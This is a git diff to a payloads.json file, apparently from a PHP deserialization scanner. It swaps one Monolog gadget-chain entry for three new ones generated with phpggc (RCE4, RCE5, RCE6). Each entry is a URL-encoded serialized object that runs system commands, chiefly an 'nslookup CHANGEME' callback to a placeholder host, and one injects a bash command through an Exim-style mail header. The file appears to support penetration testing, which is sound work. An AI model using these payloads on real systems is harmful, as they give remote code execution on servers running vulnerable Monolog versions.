diff --git a/res/payloads.json b/res/payloads.json index 4e85eee..daafc51 100644 --- a/res/payloads.json +++ b/res/payloads.json @@ -85,9 +85,21 @@ }, { "_needs_dynamic_payload_editing": false, - "name": "Monolog 1.5 <= 1.17", - "gen_with": "./phpggc Monolog/RCE2 ", - "payload": "O:32:\"Monolog\\Handler\\SyslogUdpHandler\":1:{s:6:\"socket\"%3BO:29:\"Monolog\\Handler\\BufferHandler\":7:{s:10:\"%00*%00handler\"%3BO:29:\"Monolog\\Handler\\BufferHandler\":7:{s:10:\"%00*%00handler\"%3BN%3Bs:13:\"%00*%00bufferSize\"%3Bi:-1%3Bs:9:\"%00*%00buffer\"%3Ba:1:{i:0%3Ba:2:{i:0%3Bs:72:\"nslookup CHANGEME\"%3Bs:5:\"level\"%3BN%3B}}s:8:\"%00*%00level\"%3BN%3Bs:14:\"%00*%00initialized\"%3Bb:1%3Bs:14:\"%00*%00bufferLimit\"%3Bi:-1%3Bs:13:\"%00*%00processors\"%3Ba:2:{i:0%3Bs:7:\"current\"%3Bi:1%3Bs:6:\"system\"%3B}}s:13:\"%00*%00bufferSize\"%3Bi:-1%3Bs:9:\"%00*%00buffer\"%3Ba:1:{i:0%3Ba:2:{i:0%3Bs:72:\"nslookup CHANGEME\"%3Bs:5:\"level\"%3BN%3B}}s:8:\"%00*%00level\"%3BN%3Bs:14:\"%00*%00initialized\"%3Bb:1%3Bs:14:\"%00*%00bufferLimit\"%3Bi:-1%3Bs:13:\"%00*%00processors\"%3Ba:2:{i:0%3Bs:7:\"current\"%3Bi:1%3Bs:6:\"system\"%3B}}}" + "name": "Monolog ? <= 2.4.4+", + "gen_with": "./phpggc Monolog/RCE4 ", + "payload": "O:30:\"Monolog\\Handler\\RollbarHandler\":2:{s:42:\"%00Monolog\\Handler\\RollbarHandler%00hasRecords\"%3Bb:1%3Bs:16:\"%00*%00rollbarLogger\"%3BO:29:\"Monolog\\Handler\\BufferHandler\":3:{s:13:\"%00*%00bufferSize\"%3Bi:2%3Bs:10:\"%00*%00handler\"%3BO:35:\"Monolog\\Handler\\NativeMailerHandler\":7:{s:8:\"%00*%00level\"%3Bi:1%3Bs:13:\"%00*%00processors\"%3Ba:1:{i:0%3Bs:13:\"array_reverse\"%3B}s:12:\"%00*%00formatter\"%3BO:31:\"Monolog\\Formatter\\LineFormatter\":1:{s:9:\"%00*%00format\"%3Bs:0:\"\"%3B}s:17:\"%00*%00maxColumnWidth\"%3Bi:20%3Bs:13:\"%00*%00parameters\"%3Ba:1:{i:0%3Bs:3:\"-be\"%3B}s:5:\"%00*%00to\"%3Ba:1:{i:0%3Bs:14:\"init@localhost\"%3B}s:10:\"%00*%00headers\"%3Ba:1:{i:0%3Bs:115:\"${run{/bin/bash -c \"nslookup CHANGEME?1620384651\"}{yes}{no}}\"%3B}}s:9:\"%00*%00buffer\"%3Ba:1:{i:0%3Ba:5:{s:5:\"level\"%3Bi:100%3Bs:7:\"message\"%3Bi:1%3Bs:7:\"context\"%3Ba:0:{}s:5:\"extra\"%3Ba:0:{}s:7:\"channel\"%3Bi:1%3B}}}}" + }, + { + "_needs_dynamic_payload_editing": false, + "name": "Monolog 1.25 <= 2.2.0+", + "gen_with": "./phpggc Monolog/RCE5 ", + "payload": "O:37:\"Monolog\\Handler\\FingersCrossedHandler\":3:{s:16:\"%00*%00passthruLevel\"%3Bi:0%3Bs:9:\"%00*%00buffer\"%3Ba:1:{s:4:\"test\"%3Ba:2:{i:0%3Bs:72:\"nslookup CHANGEME\"%3Bs:5:\"level\"%3BN%3B}}s:10:\"%00*%00handler\"%3BO:28:\"Monolog\\Handler\\GroupHandler\":1:{s:13:\"%00*%00processors\"%3Ba:2:{i:0%3Bs:7:\"current\"%3Bi:1%3Bs:6:\"system\"%3B}}}" + }, + { + "_needs_dynamic_payload_editing": false, + "name": "Monolog 1.10.0 <= 2.2.0+", + "gen_with": "./phpggc Monolog/RCE6 ", + "payload": "O:37:\"Monolog\\Handler\\FingersCrossedHandler\":3:{s:16:\"%00*%00passthruLevel\"%3Bi:0%3Bs:9:\"%00*%00buffer\"%3Ba:1:{s:4:\"test\"%3Ba:2:{i:0%3Bs:72:\"nslookup CHANGEME\"%3Bs:5:\"level\"%3BN%3B}}s:10:\"%00*%00handler\"%3BO:29:\"Monolog\\Handler\\BufferHandler\":7:{s:10:\"%00*%00handler\"%3BN%3Bs:13:\"%00*%00bufferSize\"%3Bi:-1%3Bs:9:\"%00*%00buffer\"%3BN%3Bs:8:\"%00*%00level\"%3BN%3Bs:14:\"%00*%00initialized\"%3Bb:1%3Bs:14:\"%00*%00bufferLimit\"%3Bi:-1%3Bs:13:\"%00*%00processors\"%3Ba:2:{i:0%3Bs:7:\"current\"%3Bi:1%3Bs:6:\"system\"%3B}}}" }, { "_needs_dynamic_payload_editing": false,